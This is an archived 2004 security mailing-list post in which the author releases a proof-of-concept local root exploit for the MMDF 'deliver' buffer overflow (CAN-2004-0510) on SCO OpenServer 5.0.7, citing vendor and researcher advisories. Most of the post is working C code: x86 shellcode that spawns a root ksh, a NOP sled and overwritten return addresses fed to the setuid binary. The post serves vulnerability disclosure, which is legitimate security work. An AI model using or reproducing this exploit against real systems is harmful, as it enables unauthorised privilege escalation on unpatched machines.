From: Ramon de Carvalho Valle (ramondecarvalhoyahoo.com.br)
Date: Wed Oct 27 2004 - 02:25:01 CDT

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi,

I have written a proof of concept code for one of the various buffer overflows reported by Deprotect and SCO in:
ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2004.7/SCOSA-2004.7.txt
http://www.deprotect.com/advisories/DEPROTECT-20040206.txt

The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned MMDF buffer overflows the name CAN-2004-0510.

/*
 * MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86
 * Copyright 2004 Ramon de Carvalho Valle
 *
 */

char shellcode[]= /* 36 bytes */
    "\x68\xff\xf8\xff\x3c" /* pushl $0x3cfff8ff */
    "\x6a\x65" /* pushl $0x65 */
    "\x89\xe6" /* movl %esp,%esi */
    "\xf7\x56\x04" /* notl 0x04(%esi) */
    "\xf6\x16" /* notb (%esi) */
    "\x31\xc0" /* xorl %eax,%eax */
    "\x50" /* pushl %eax */
    "\x68""/ksh" /* pushl $0x68736b2f */
    "\x68""/bin" /* pushl $0x6e69622f */
    "\x89\xe3" /* movl %esp,%ebx */
    "\x50" /* pushl %eax */
    "\x50" /* pushl %eax */
    "\x53" /* pushl %ebx */
    "\xb0\x3b" /* movb $0x3b,%al */
    "\xff\xd6" /* call *%esi */
;

main(int argc,char **argv) {
    char buffer[16384],address[4],*p;
    int i;

    printf("MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86\n");
    printf("Copyright 2004 Ramon de Carvalho Valle\n\n");

    *((unsigned long *)address)=(unsigned long)buffer-256+5120+4097;

    sprintf(buffer,"-c");
    p=buffer+2;
    for(i=0;i<5120;i++) *p++=address[i%4];
    for(i=0;i<8192;i++) *p++=0x90;
    for(i=0;i<strlen(shellcode);i++) *p++=shellcode[i];
    *p=0;

    execl("/usr/mmdf/bin/deliver","deliver",buffer,0);
}

Best regards,
Ramon de Carvalho Valle

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]